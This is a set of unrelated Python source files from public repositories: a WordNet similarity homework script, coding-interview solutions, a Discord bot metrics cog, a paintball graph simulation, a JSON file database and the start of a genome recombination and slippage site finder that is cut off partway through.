WNQuery\nimport os\nimport pickle\nimport networkx as nx\nimport matplotlib.pyplot as plt\nimport math\n\nnullout = open(os.devnull, \"w\")\n\ndef make_synonym_string(synset):\n return \",\".join([syn.literal for syn in synset.synonyms])\n\n\n\n\nwn = WNQuery.WNQuery(\"./plwordnet-3.1-visdisc.xml\", nullout)\n\ndef synset_from_wnid(wnid):\n return next((wn.lookUpID(wnid, i) for i in [\"n\", \"v\", \"a\", \"b\"]), None)\n\ndef synset_from_literal_and_sense(literal, sense):\n return next((wn.lookUpSense(literal, sense, i) for i in [\"n\", \"v\", \"a\", \"b\"]), None)\n\ndef my_lea_cho(wnid_from, wnid_to):\n D = 20\n already_visited = set()\n def make_step(to_visit):\n new_to_visit = set()\n for wnid_to_visit in to_visit:\n synset = synset_from_wnid(wnid_to_visit)\n if synset:\n for wnid, relation in synset.ilrs:\n if wnid == wnid_to:\n return 1\n if wnid not in already_visited:\n new_to_visit.add(wnid)\n already_visited.add(wnid)\n return 1 + make_step(new_to_visit)\n \n return - math.log(make_step(set([wnid_from])) / D)\n\ndef my_lea_cho_fixed(wnid_from, wnid_to):\n wnids = [wnid_from, wnid_to]\n def find_with_relations(wnid, relation_str):\n synset = synset_from_wnid(wnid)\n if synset:\n result = []\n for wnid, relation in synset.ilrs:\n if relation == relation_str:\n result.append(wnid)\n return result\n else:\n return []\n\n def find_hypernyms(wnid):\n return find_with_relations(wnid, \"hypernym\")\n\n def find_hyponyms(wnid):\n return find_with_relations(wnid, \"hyponym\")\n\n hypernyms = []\n\n def max_taxonomy_depth(wnid):\n hyponyms = find_hyponyms(wnid)\n if hyponyms:\n return 1 + max(max_taxonomy_depth(wn) for wn in hyponyms)\n else:\n return 0;\n\n for i, wnid in enumerate(wnids):\n tree = [[wnid]]\n\n\n def is_in_tree(wn):\n for level in tree:\n for wn_ in level:\n if wn_ == wn:\n return True\n return False\n\n while(True):\n to_insert = []\n for last_wnid in tree[-1]:\n 
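# collect hypernyms of the current frontier; only unseen ones are queued for the next tree level\n                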
hyps = find_hypernyms(last_wnid)\n for hyp in hyps:\n if not is_in_tree(hyp):\n to_insert.append(hyp)\n if to_insert:\n tree.append(to_insert);\n else:\n break\n\n hypernyms.append(tree)\n\n \n connections = []\n\n for level_a, list_a in enumerate(hypernyms[0]):\n for wnid_a in list_a:\n for level_b, list_b in enumerate(hypernyms[1]):\n for wnid_b in list_b:\n if wnid_a == wnid_b:\n connections.append([wnid_a, level_a + level_b])\n\n taxonomy_depths = []\n for tree in hypernyms:\n for root in tree[-1]:\n taxonomy_depths.append(max_taxonomy_depth(root))\n\n D = max(taxonomy_depths)\n\n if connections:\n min_closest = min(connections, key=lambda x: x[1])[1]\n else:\n min_closest = max(len(hypernyms[0]), len(hypernyms[1]))\n D += 1\n\n return - math.log(min_closest / (2 * D))\n \n \n \n\nprint(\"Zad 3. \\\"szkoda\\\":\")\n\nszkodaLookup = wn.lookUpLiteral(\"szkoda\", \"n\")\n\n\nfor result in szkodaLookup:\n print()\n print(\"Znaczenie: {}\".format(result.definition))\n print(\"Synonimy: {}\".format(\", \".join([syn.literal for syn in result.synonyms])))\n\n\nprint(\"Zad 4. \\\"wypadek drogowy\\\":\\n\")\n\nwypadekLookup = wn.lookUpLiteral(\"wypadek drogowy\", \"n\")\n\nif wypadekLookup:\n result = wypadekLookup[0]\n\n first = wn.lookUpRelation(result.wnid, \"n\", \"hypernym\")\n\n edge_labels = {}\n node_labels = {}\n\n G = nx.DiGraph()\n \n def find_hypernyms(wnid):\n G.add_node(wnid)\n synset = synset_from_wnid(wnid)\n\n node_labels[synset.wnid] = synset.wnid + \"\\n\\n\" + make_synonym_string(synset)\n rel_res = wn.lookUpRelation(synset.wnid, synset.pos, \"hypernym\")\n for new_wnid in rel_res:\n G.add_edge(wnid, new_wnid)\n edge_labels[(synset.wnid, new_wnid)] = \"hyperonimia\"\n find_hypernyms(new_wnid)\n \n find_hypernyms(result.wnid)\n\n plt.figure()\n\n lay = nx.layout.circular_layout(G)\n\n nx.draw_networkx_nodes(G, lay, alpha=0.0)\n nx.draw_networkx_edges(G, lay)\n nx.draw_networkx_labels(G, lay, node_labels, font_size=6)\n nx.draw_networkx_edge_labels(G, lay, edge_labels, font_size=6)\n\n ax = plt.gca()\n ax.set_axis_off()\n\n plt.savefig(\"zad4.png\")\n\n print(\"![](zad4.png)\")\n\nprint(\"Zad 5. wypadek:1\\n\")\n\nrightWypadek = wn.lookUpSense(\"wypadek\", 1, \"n\")\n\nif rightWypadek:\n\n firstHyponyms = wn.lookUpRelation(rightWypadek.wnid, \"n\", \"hyponym\")\n\n print(\"Hiponimie 1 rzędu:\\n\")\n\n for hypo_wnid in firstHyponyms:\n print(\"{}: {}\".format(hypo_wnid,make_synonym_string(synset_from_wnid(hypo_wnid))))\n\n print(\"\\nZad 6. 
cd wypadek:1\\n\")\n\n print(\"Hiponimie 2 rzędu:\\n\")\n\n for hypo_wnid1 in firstHyponyms:\n for hypo_wnid2 in wn.lookUpRelation(hypo_wnid1, \"n\", \"hyponym\"):\n print(\"{}: {}\".format(hypo_wnid2,make_synonym_string(synset_from_wnid(hypo_wnid2))))\n\nprint(\"\\nZad 7.\\n\")\n\nwords_list = [[(\"szkoda\",2), (\"strata\",1), (\"uszczerbek\",1), (\"szkoda majątkowa\",1),(\"uszczerbek na zdrowiu\",1), (\"krzywda\",1), (\"niesprawiedliwość\",1), (\"nieszczęście\",2)],[(\"wypadek\",1), (\"wypadek komunikacyjny\",1), (\"kolizja\",2), (\"zderzenie\",2), (\"kolizja drogowa\",1), (\"katastrofa budowlana\",1), (\"wypadek drogowy\",1)]]\n\nfor i, words in enumerate(words_list):\n plt.figure()\n G = nx.MultiDiGraph()\n\n node_labels = {}\n edge_labels = {}\n\n for word, sense in words:\n synset = synset_from_literal_and_sense(word, sense)\n if not synset:\n print(\"{}:{}\".format(word, sense))\n \n G.add_node(synset.wnid)\n node_labels[synset.wnid] = \"{}:{}\".format(word, sense)\n \n for word, sense in words:\n synset = synset_from_literal_and_sense(word, sense)\n for wnid, relation in synset.ilrs:\n if wnid in node_labels:\n G.add_edge(synset.wnid, wnid)\n edge_labels[(synset.wnid, wnid)] = relation\n\n lay = nx.layout.circular_layout(G)\n\n nx.draw_networkx_nodes(G, lay, alpha=0.0)\n nx.draw_networkx_edges(G, lay)\n nx.draw_networkx_labels(G, lay, node_labels, font_size=6)\n nx.draw_networkx_edge_labels(G, lay, edge_labels, font_size=6, label_pos=0.3)\n\n ax = plt.gca()\n ax.set_axis_off()\n\n plt.savefig(\"zad7_{}.png\".format(i+1))\n\n print(\"![](zad7_{}.png)\".format(i+1))\n\nprint(\"Brakowało słowa \\\"bezkolizyjny\\\" w SłowoSieci.\")\n\nprint(\"\\nZad 8.\\n\")\n\nto_calc = [((\"szkoda\",2),(\"wypadek\",1)),((\"kolizja\",2),(\"szkoda majątkowa\",1)),((\"nieszczęście\",2),(\"katastrofa budowlana\",1))]\n\nfor word1, word2 in to_calc:\n syn1 = synset_from_literal_and_sense(word1[0], word1[1])\n syn2 = synset_from_literal_and_sense(word2[0], word2[1])\n \n value1 = wn.simLeaCho(syn1.wnid, syn2.wnid, \"n\", \"hypernym\", True)\n\n value2 = my_lea_cho_fixed(syn1.wnid, syn2.wnid)\n\n #my_lea_cho_fixed(syn1.wnid, syn2.wnid)\n\n print(\"WNQuery.simLeaCho({},{})={:.3f}\".format(word1[0], word2[0], value1))\n\n print(\"my_lea_cho_fixed({},{})={:.3f}\".format(word1[0], word2[0], value2))\n","repo_name":"m-karcz/PJN","sub_path":"7-wordnet/pywnxml/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"70697296537","text":"#!/usr/bin/python3\n\"\"\"\nTask 0: minimum operations\n\"\"\"\n\n\"\"\"\ndef minOperations(n):\n a method that calculates the fewest number\n of operations needed to result in exactly\n n H characters in the file\n\n if type(n) != int or n <= 0:\n return 0\n hCf = h_c_f(n)\n max_op = n // hCf\n while hCf != 1:\n x = h_c_f(hCf)\n max_op += hCf // x\n hCf = x\n return max_op\n\n\ndef h_c_f(val):\n\n calculates the highest common factor\n\n if val <= 3:\n return 1\n fac = 1\n for i in range(2, (val // 2) + 1):\n if (val % i) == 0:\n fac = i\n return fac\n\"\"\"\n\n\ndef minOperations(n):\n '''Computes the fewest number of operations needed to result\n in exactly n H characters.\n '''\n if not isinstance(n, int):\n return 0\n ops_count = 0\n clipboard = 0\n done = 1\n # print('H', end='')\n while done < n:\n if clipboard == 0:\n # init (the first copy all and paste)\n clipboard = done\n done += clipboard\n ops_count += 2\n # print('-(11)->{}'.format('H' * done), 
end='')\n elif n - done > 0 and (n - done) % done == 0:\n # copy all and paste\n clipboard = done\n done += clipboard\n ops_count += 2\n # print('-(11)->{}'.format('H' * done), end='')\n elif clipboard > 0:\n # paste\n done += clipboard\n ops_count += 1\n # print('-(01)->{}'.format('H' * done), end='')\n # print('')\n return ops_count\n","repo_name":"Senseiuc/alx-interview","sub_path":"0x02-minimum_operations/0-minoperations.py","file_name":"0-minoperations.py","file_ext":"py","file_size_in_byte":1541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"1063173098","text":"import ast\nimport astunparse\nf = open('/home/daniel/Documents/College/Semester7/Research/type-analyzer/allrepo/original/(5j9)wikitextparser*tests*test_config.pyi')\n\nclass Analyzer(ast.NodeVisitor):\n def visit_FunctionDef(self, node):\n for arg in node.args.args:\n if arg.annotation != None:\n q = astunparse.unparse(arg.annotation)\n print(q)\n\na = Analyzer()\na.visit(ast.parse(f.read()))","repo_name":"proganalysis/repository-statistics","sub_path":"tools/param.py","file_name":"param.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"33097748328","text":"class Solution(object):\n def complexNumberMultiply(self, num1, num2):\n \"\"\"\n :type num1: str\n :type num2: str\n :rtype: str\n \"\"\"\n num1_real, num1_imaginary = map(int, num1[:-1].split('+'))\n\n num2_real, num2_imaginary = map(int, num2[:-1].split('+'))\n\n num_real = (num1_real * num2_real) - (num1_imaginary * num2_imaginary)\n num_imaginary = (num1_real * num2_imaginary) + (num2_real * num1_imaginary) \n\n rs = \"{}+{}i\".format(num_real, num_imaginary)\n\n return rs\n","repo_name":"ngocvtd/leetcode","sub_path":"537.ComplexNumberMultiplication.py","file_name":"537.ComplexNumberMultiplication.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"38770778102","text":"from contextlib import suppress\nimport asyncio\nimport os\n\nfrom discord.ext import commands, tasks\nfrom influxdb_client import InfluxDBClient, Point\nfrom influxdb_client.client.write_api import SYNCHRONOUS\nimport psutil\n\n\nclass Influx(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n auth = self.bot.auth[\"InfluxDB\"]\n self.client = InfluxDBClient(\n url=auth[\"url\"],\n token=auth[\"token\"],\n org=auth[\"org\"]\n )\n self.write_api = self.client.write_api(write_options=SYNCHRONOUS)\n self.last = {\n \"users\": len(bot.users),\n \"guilds\": len(bot.guilds)\n }\n self.process = psutil.Process(os.getpid())\n self.messages = 0\n self.update_user_count.start()\n self.update_stats.start()\n\n def cog_unload(self):\n self.update_user_count.cancel()\n self.update_stats.cancel()\n\n def start_thread(self, pointer):\n with suppress(Exception):\n layer = lambda: self.write_api.write(\"542f070eec1976be\", record=pointer)\n return self.bot.loop.run_in_executor(None, layer)\n\n @tasks.loop(seconds=60)\n async def update_user_count(self):\n if not self.bot.is_ready():\n return\n with suppress(Exception):\n async def user_count():\n count = 0\n for guild in list(self.bot.guilds):\n await asyncio.sleep(0)\n count += guild.member_count\n return count\n\n if not self.bot.is_ready():\n await self.bot.wait_until_ready()\n self.last = {\n \"users\": await user_count(),\n \"guilds\": len(self.bot.guilds)\n }\n\n # Update user count\n 
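# only push an InfluxDB point when the aggregate user count actually changed since the last sample\n            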
new_count = await user_count()\n if new_count != self.last[\"users\"]:\n pointer = Point(\"activity\").field(\"users\", new_count)\n await self.start_thread(pointer)\n self.last[\"users\"] = new_count\n\n @tasks.loop(seconds=10)\n async def update_stats(self):\n \"\"\" Updates the cpu usage and bot ping \"\"\"\n def get_cpu_percentage():\n \"\"\" Returns the bots cpu usage over the span of 3s \"\"\"\n return self.process.cpu_percent(interval=5)\n\n with suppress(Exception):\n result = await self.bot.loop.run_in_executor(\n None, get_cpu_percentage\n )\n cpu = round(result)\n ping = round(self.bot.latency * 1000)\n pointer = Point(\"stats\").field(\"cpu\", cpu).field(\"ping\", ping).field(\"messages\", self.messages)\n self.messages = 0\n await self.start_thread(pointer)\n\n @commands.Cog.listener(\"on_guild_join\")\n @commands.Cog.listener(\"on_guild_remove\")\n async def on_guild_count_change(self, _guild):\n if self.bot.is_ready():\n pointer = Point(\"activity\").field(\"guilds\", len(self.bot.guilds))\n await self.start_thread(pointer)\n self.last[\"guilds\"] = len(self.bot.guilds)\n\n @commands.Cog.listener()\n async def on_message(self, _message):\n self.messages += 1\n\n @commands.Cog.listener()\n async def on_command(self, ctx):\n await asyncio.sleep(1) # Let the command process first\n pointer = Point(\"commands\").field(ctx.command.name, 1)\n await self.start_thread(pointer)\n\n\ndef setup(bot):\n bot.add_cog(Influx(bot))\n","repo_name":"Villagers654-zz/Fate","sub_path":"cogs/core/influx.py","file_name":"influx.py","file_ext":"py","file_size_in_byte":3469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"11993743375","text":"class SubsetGenerator:\r\n def __init__(self):\r\n self.arr = []\r\n\r\n def print_subsets(self):\r\n n = len(self.arr)\r\n num_subsets = 1 << n\r\n print(num_subsets)\r\n\r\n for i in range(num_subsets):\r\n subset = []\r\n for j in range(n):\r\n if (i >> j) & 1:\r\n subset.append(self.arr[j])\r\n print(subset)\r\n\r\n def take_input(self):\r\n n = int(input(\"Enter number of elements: \"))\r\n print(\"Enter elements:\")\r\n for i in range(n):\r\n temp = int(input())\r\n self.arr.append(temp)\r\n print(\"List of elements:\", self.arr)\r\n self.print_subsets()\r\n\r\n\r\ndef main():\r\n subset_generator = SubsetGenerator()\r\n subset_generator.take_input()\r\n\r\n\r\nmain()\r\n","repo_name":"kashyapkurmilla/CCE-AP-Lab","sub_path":"lab-5/q3.py","file_name":"q3.py","file_ext":"py","file_size_in_byte":790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"28090735657","text":"\"\"\"\nCSCI-603 Lab 9(Holi Cow)\nAuthor: Indrajeet Vidhate\nAuthor: Shubham Patil\n\"\"\"\n\nimport sys\nimport math\n\n\nclass CowNode:\n \"\"\"\n Node Class for the cows.\n \"\"\"\n __slots__ = 'name', 'X', 'Y', 'color', 'neighbors', 'colorsTriggered'\n\n def __init__(self, name, X, Y):\n self.name = name\n self.X = int(X)\n self.Y = int(Y)\n self.color = []\n self.neighbors = []\n self.colorsTriggered = {}\n\n def neighborList(self):\n \"\"\"\n Adjancency List for Cows\n :return:\n \"\"\"\n connectedTo = []\n for x in self.neighbors:\n connectedTo.append(x.name)\n return connectedTo\n\n def __str__(self):\n return self.name\n\n\nclass PaintballNode:\n \"\"\"\n Node Class for the Paint-balls\n \"\"\"\n __slots__ = 'name', 'X', 'Y', 'radius', 'neighbors', 'directNeighbors'\n\n def __init__(self, name, X, Y, radius):\n self.name = name\n self.X = int(X)\n self.Y = 
int(Y)\n self.radius = int(radius)\n self.neighbors = []\n self.directNeighbors = []\n\n def addNeighbor(self, neighbor):\n \"\"\"\n Adds given node to adjecency list of Paint-ball\n :param neighbor: Node to be added to Adjacency List\n :return:\n \"\"\"\n if isinstance(neighbor, CowNode):\n self.neighbors.append(neighbor)\n self.directNeighbors.append(neighbor)\n else:\n self.neighbors.append(neighbor)\n self.directNeighbors.append(neighbor)\n for x in neighbor.neighbors:\n if x not in self.neighbors:\n self.neighbors.append(x)\n\n def neighborList(self):\n \"\"\"\n Adjacency List of the Paint-ball\n :return:\n \"\"\"\n connectedTo = []\n for x in self.directNeighbors:\n connectedTo.append(x.name)\n return connectedTo\n\n def trigger(self, visited=None):\n \"\"\"\n Triggers the paintball and paints cows within it's range and\n triggers other paintballs within it's range.\n :param visited:\n :return:\n \"\"\"\n count = 0\n if visited is None:\n visited = []\n visited.append(self)\n\n for x in self.directNeighbors:\n if x not in visited:\n if isinstance(x, CowNode):\n print(\"\\t\", x.name, \"is painted\", self.name)\n count += 1\n if isinstance(x, PaintballNode):\n print(\"\\t\", x.name, \"Paintball is triggered by\", self.name, \"Paintball!\")\n count += x.trigger(visited)\n return count\n\n def winner_result(self, visited=None):\n \"\"\"\n To identify chain reaction caused by best choice paint-ball.\n :param visited:\n :return:\n \"\"\"\n if visited is None:\n visited = []\n visited.append(self)\n\n for x in self.directNeighbors:\n if x not in visited:\n if isinstance(x, CowNode):\n x.color.append(self.name)\n if isinstance(x, PaintballNode):\n x.winner_result(visited)\n\n def __str__(self):\n return self.name\n\n\nclass Graph:\n \"\"\"\n Class to generate Graph for CowNodes and PaintballNodes\n \"\"\"\n __slots__ = 'fieldInfo', 'colorCount'\n\n def __init__(self):\n self.fieldInfo = {}\n self.colorCount = {}\n\n def in_range(self, Obj1, Obj2):\n \"\"\"\n tells whether two nodes are within range of each other.\n :param Obj1: Must be PaintballNode\n :param Obj2: Can be CowNode or PaintballNode\n :return: true if given Obj2 is within reach of Obj1\n \"\"\"\n x1 = Obj1.X\n y1 = Obj1.Y\n x2 = Obj2.X\n y2 = Obj2.Y\n distance = math.sqrt((x2 - x1) ** 2 + (y2 - y1) ** 2)\n return distance <= Obj1.radius\n\n def addCowNode(self, name, X, Y):\n \"\"\"\n Adds the CowNode to the Graph and Adjacency List of Paintballs\n for which they are in range.\n :param name: Name of the Cow\n :param X: x co-ordinate of CowNode\n :param Y: y co-ordinate of CowNode\n :return:\n \"\"\"\n self.fieldInfo[name] = CowNode(name, X, Y)\n for x in self.fieldInfo:\n if not x == name and isinstance(self.fieldInfo[x], PaintballNode):\n if self.in_range(self.fieldInfo[x], self.fieldInfo[name]):\n self.fieldInfo[x].addNeighbor(self.fieldInfo[name])\n\n def addPaintballNode(self, name, X, Y, radius):\n \"\"\"\n Adds the PaintballNode to the Graph and Adjacency List of Paintballs\n for which they are in range.\n :param name: Color of Paintball\n :param X: x co-ordinate of PaintballNode\n :param Y: y co-ordinate of PaintballNode\n :param radius: radius of PaintballNode\n :return:\n \"\"\"\n self.fieldInfo[name] = PaintballNode(name, X, Y, radius)\n for x in self.fieldInfo:\n if not x == name:\n if isinstance(self.fieldInfo[x], CowNode):\n if self.in_range(self.fieldInfo[name], self.fieldInfo[x]):\n self.fieldInfo[name].addNeighbor(self.fieldInfo[x])\n else:\n if self.in_range(self.fieldInfo[name], self.fieldInfo[x]):\n 
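# a cow lying within this paintball's blast radius becomes one of its direct neighbors\n                        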
self.fieldInfo[name].addNeighbor(self.fieldInfo[x])\n                else:\n                    if self.in_range(self.fieldInfo[name], self.fieldInfo[x]):\n                        self.fieldInfo[name].addNeighbor(self.fieldInfo[x])\n                    elif self.in_range(self.fieldInfo[x], self.fieldInfo[name]):\n                        self.fieldInfo[x].addNeighbor(self.fieldInfo[name])\n\n    def simulate(self):\n        \"\"\"\n        Triggers all the paintballs in the Field(Graph)\n        :return:\n        \"\"\"\n        for x in self.fieldInfo:\n            if isinstance(self.fieldInfo[x], PaintballNode):\n                print(\"Triggering\", x, \"Paintball\")\n                self.colorCount[x] = self.fieldInfo[x].trigger()\n\n    def displayColor(self):\n        \"\"\"\n        Displays the colors painted on cows after triggering the paint-balls\n        :return:\n        \"\"\"\n        for x in self.fieldInfo:\n            if isinstance(self.fieldInfo[x], CowNode):\n                print(x + \"'s colors:\", self.fieldInfo[x].color)\n\n    def result(self):\n        \"\"\"\n        Displays the best choice paint-ball along with the number of\n        cows painted due to triggering of that paintball.\n        :return: max : number of cows painted due to triggering,\n                 color: The best choice Paintball\n        \"\"\"\n        max = 0\n        for x in self.colorCount:\n            if self.colorCount[x] > max:\n                max = self.colorCount[x]\n                color = x\n        if not max == 0:\n            self.fieldInfo[color].winner_result()\n            return max, color\n        else:\n            return 0, 0\n\n\ndef main():\n    \"\"\"\n    Reads the Field(Graph) input from a file, generates the\n    Graph and simulates triggering of paint-balls.\n    :return:\n    \"\"\"\n    if len(sys.argv) == 2:\n        file_name = sys.argv[1]\n    else:\n        print(\"Usage: holicow.py <filename>\")\n    field = Graph()\n    with open(file_name) as f:\n        for line in f:\n            line.strip()\n            entry = line.split()\n            if entry[0] == 'cow':\n                field.addCowNode(entry[1], entry[2], entry[3])\n\n            if entry[0] == 'paintball':\n                field.addPaintballNode(entry[1], entry[2], entry[3], entry[4])\n\n    print(\"Field of Dreams\")\n    print(\"---------------\")\n    for nodes in field.fieldInfo:\n        print(nodes, \" connected to \", field.fieldInfo[nodes].neighborList())\n\n    print(\"Beginning Simulation...\")\n    field.simulate()\n\n    print(\"Results:\")\n    max, color = field.result()\n    if max > 0:\n        print(\"Triggering the\", color, \"paint-ball is the best choice with\", max, \"total paint on cows.\")\n        field.displayColor()\n    else:\n        print(\"No cows were painted by any starting paint-ball!\")\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"ShubhamPatil7-zz/Data-Structure-and-Algorithms","sub_path":"holicow.py","file_name":"holicow.py","file_ext":"py","file_size_in_byte":7981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"26692651200","text":"import json\r\n\r\nmax_id = None\r\n\r\n\r\nclass Database(object):\r\n    def __init__(self):\r\n        self.json_file_path = \"db.json\"\r\n        self.data = self.load_data()\r\n\r\n    def load_data(self):\r\n        global max_id\r\n\r\n        try:\r\n            with open(self.json_file_path, 'r') as file:\r\n                res = []\r\n                data = json.load(file)\r\n                for d in data:\r\n                    res.append(json.loads(d) if isinstance(d, str) else d)\r\n\r\n                max_id = 0 if len(res) == 0 else max(res, key=lambda x: x['id'])['id']\r\n\r\n                return res\r\n        except FileNotFoundError:\r\n            # If the file doesn't exist, create an empty data structure\r\n            max_id = 0\r\n            return []\r\n\r\n    def save_data(self):\r\n        with open(self.json_file_path, 'w') as file:\r\n            res = []\r\n            for d in self.data:\r\n                if hasattr(d, 'json') and callable(d.json):\r\n                    res.append(d.json())\r\n                else:\r\n                    res.append(d)\r\n\r\n            json.dump(res, file, indent=2)\r\n\r\n    def insert_data(self, record):\r\n        self.data.append(record)\r\n        self.save_data()\r\n\r\n    def get_all_data(self):\r\n        return self.data\r\n\r\n    def delete_data(self, record_id):\r\n        
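# rebuild the list without the matching record, persist it, and return the removed record (or None)\r\n        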
removed = None\r\n        new_data = []\r\n\r\n        for record in self.data:\r\n            if record.get('id') != record_id:\r\n                new_data.append(record)\r\n            else:\r\n                removed = record\r\n\r\n        self.data = new_data\r\n        self.save_data()\r\n        return removed\r\n\r\n    def update_data(self, record_id, new_values):\r\n        for record in self.data:\r\n            if record.get('id') == record_id:\r\n                record.update(new_values)\r\n                self.save_data()\r\n\r\n    def search_by_criteria(self, search_criteria):\r\n        if 'id' in search_criteria:\r\n            record_id = search_criteria['id']\r\n            return [record for record in self.data if record.get('id') == record_id]\r\n        else:\r\n            return [record for record in self.data if all(record[key] == value for key, value in search_criteria.items())]\r\n\r\n    def get_record_by_id(self, record_id):\r\n        results = self.search_by_criteria({'id': record_id})\r\n        return results[0] if results else None\r\n\r\n    def group_by(self, key):\r\n        grouped_data = {}\r\n        for record in self.data:\r\n            value = record.get(key)\r\n            if value not in grouped_data:\r\n                grouped_data[value] = []\r\n            grouped_data[value].append(record)\r\n        return grouped_data\r\n\r\n    def sort_by(self, key, reverse=False):\r\n        self.data.sort(key=lambda x: x.get(key), reverse=reverse)\r\n        return self.data\r\n\r\n","repo_name":"axshani/py_server","sub_path":"services/database.py","file_name":"database.py","file_ext":"py","file_size_in_byte":2723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"964277943","text":"from Bio.SeqIO import parse\nfrom sklearn.feature_extraction.text import CountVectorizer\nimport numpy as np\nimport re\nfrom pandas import DataFrame, concat\nfrom textwrap import wrap\nimport os\nimport glob\nfrom pathlib import Path\nimport gzip\nfrom os.path import join\n\n\n\n\n\n### calculate part of sequence based on start and end indexes\ndef genome_cutter(start, end, seq):\n    return seq[start:end]\n\n\n\ndef find_recombination_sites(example_seq, num_sites):\n\n    ### count all sequences of length 16\n    vectorizer = CountVectorizer(analyzer= 'char_wb', ngram_range=(16, 16))\n    counter = vectorizer.fit_transform([example_seq]).toarray()\n\n    ### find those that appear more than once\n    sites_recombination = list(np.where(counter > 1)[1])\n\n    if len(sites_recombination)==0:\n        return DataFrame(columns = ['start', 'end'])\n\n    ### get all sequences\n    all_sites = vectorizer.get_feature_names()\n\n\n    suspect_recombination = []\n\n    for site in sites_recombination:\n        ### get current site\n        curr_seq = all_sites[site]\n        ### get list of locations that are a match to the site\n        list_regions = list(re.finditer(curr_seq.upper(), example_seq))\n        ### extract coordinates from Match object\n        list_regions = [x.span() for x in list_regions]\n\n        suspect_recombination.extend(list_regions)\n\n    ### this is now a list of tuples, containing coordinates of suspect recombination sites\n    suspect_recombination = sorted(suspect_recombination)\n\n    ### turn the tuples into a dataframe of start and end coordinates of the sites\n    df_recombination = DataFrame(suspect_recombination, columns = ['start', 'end'])\n\n    ### when we have matches larger than 16, they will turn into subsequent matches of 16. The following script is meant\n    ### to join them together back to one larger region\n\n    ### find the difference between current start and previous start, and between next end to current end. For ranges in\n    ### the middle of a larger region, these will be 1 and 1. 
For our larger region, we only need the edges, so we get rid\n    ### of the rest.\n    df_recombination.loc[:, 'start_delta'] = df_recombination['start'] -df_recombination['start'].shift()\n    df_recombination.loc[:, 'end_delta'] = df_recombination['end'].shift(-1)- df_recombination['end']\n    df_recombination = df_recombination[(df_recombination.start_delta!=1.0)|(df_recombination.end_delta!=1.0)]\n\n    ### starts of region will have end_delta==1, while ends of region will have start_delta = 1. We'll want to backpropagate\n    ### the true end coordinate to the true start coordinate. So, we delete the end values in region starts, and backfill the end coordinates\n    ### afterwards, we will keep only the region starts, which now have both coordinates correct\n    df_recombination.loc[(df_recombination.end_delta == 1.0), 'end'] = None\n    df_recombination.loc[:, 'end'] = df_recombination.loc[:, 'end'].fillna(method='bfill').astype(int)-1\n    df_recombination = df_recombination[df_recombination.start_delta!=1.0][['start', 'end']]\n\n    ### attach the segment of the genetic sequence marked by these coordinates\n    df_recombination.loc[:, 'sequence'] = df_recombination.apply(lambda x: genome_cutter(x['start'], x['end'], example_seq), axis=1)\n\n    ### merge same sequences, so can easily see where the duplicates are\n    df_recombination = df_recombination.merge(df_recombination, on = 'sequence', suffixes = ('_1', '_2'))\n    ### keep them as ordered matches - also gets rid of duplicates\n    df_recombination = df_recombination[df_recombination.end_1<df_recombination.start_2]\n\n    if type(num_sites) == int:\n        df_recombination = df_recombination.head(num_sites)\n\n    return df_recombination\n\n\ndef find_slippage_sites_length_L(sequence, L):\n\n    ### for a given sequence and base unit length L, find, for L>1, all sites where\n    ### a sequence of length L repeats 3 times or more.\n\n    slippage_sites = []\n\n    ### this process needs to be repeated for all frameshifts up to L, because the repeating sequence can start in any frameshift.\n    for frameshift in range(L):\n        ### frame shift the whole sequence for ease of calculation\n        curr_seq = sequence[frameshift:]\n        ### split sequence into equal parts of length L (shortening the last part as needed).\n        curr_seq_split = wrap(curr_seq, L)\n\n        ### until what small sequence do we need to check\n        end_of_range = len(curr_seq_split)-2\n        if L==1:\n            end_of_range-=1\n        for ii in range(end_of_range):\n\n            ### in case of L>1, this expression is true when the current sequence is equal to the next two. this is to mark\n            ### the site that is prone to polymerase slippage\n            is_followed2 = ((curr_seq_split[ii]==curr_seq_split[ii+1]) and (curr_seq_split[ii]==curr_seq_split[ii+2]) and L>1)\n            ### relevant expression for L=1\n            is_followed1 = ((curr_seq_split[ii]==curr_seq_split[ii+1]) and (curr_seq_split[ii]==curr_seq_split[ii+2]) and\n                            (curr_seq_split[ii]==curr_seq_split[ii+3]) and L==1)\n\n            ### save index of start and end of region, for L>1 and L = 1\n            if is_followed2:\n                curr_start = frameshift+ii*L\n                curr_end = frameshift+L*(ii+3)\n                slippage_sites.append((curr_start, curr_end))\n\n            if is_followed1:\n                curr_start = ii\n                curr_end = ii+4\n                slippage_sites.append((curr_start, curr_end))\n\n    ### if no regions found, return empty dataframe\n    if len(slippage_sites)==0:\n        return DataFrame(columns = ['start', 'end', 'sequence', 'length_base_unit'])\n\n\n    df_slippage = DataFrame(sorted(slippage_sites), columns = ['start', 'end'])\n\n    ### once again, we have larger suspect regions represented as a sequence of small suspect regions. As before, we find\n    ### the delta to nearby start and end indices. 
